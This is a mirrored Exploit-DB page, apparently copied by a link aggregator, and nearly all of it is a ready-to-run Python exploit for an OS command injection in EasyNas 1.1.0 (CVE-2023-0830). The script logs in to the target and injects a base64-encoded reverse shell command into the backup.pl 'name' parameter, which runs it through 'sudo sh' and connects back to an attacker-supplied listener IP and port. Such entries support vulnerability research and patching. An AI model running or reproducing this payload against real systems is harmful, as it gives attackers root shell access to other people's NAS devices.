1

[webapps] EasyNas 1.1.0 - OS Command Injection

 1 year ago
source link: https://www.exploit-db.com/exploits/51266
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

EasyNas 1.1.0 - OS Command Injection

EDB-ID:

51266

EDB Verified:

Platform:

Perl

Date:

2023-04-06

Vulnerable App:

# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov ([email protected])
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830

#!/usr/bin/python3

import requests
import sys
import base64
import urllib.parse
import time

from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])

# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()

# URL encode the payload
payload = urllib.parse.quote(payload)

# Create the login data
login_data = {
    'usr':user,
    'pwd':password,
    'action':'login'
}

# Create a session
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)

# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    sys.exit()
else:
    print("Login successful")


# send the exploit request
timeout = 3

try:
    exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")

except requests.exceptions.ReadTimeout:
    print("[-] Everything seems ok, check your listener.")
    sys.exit()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK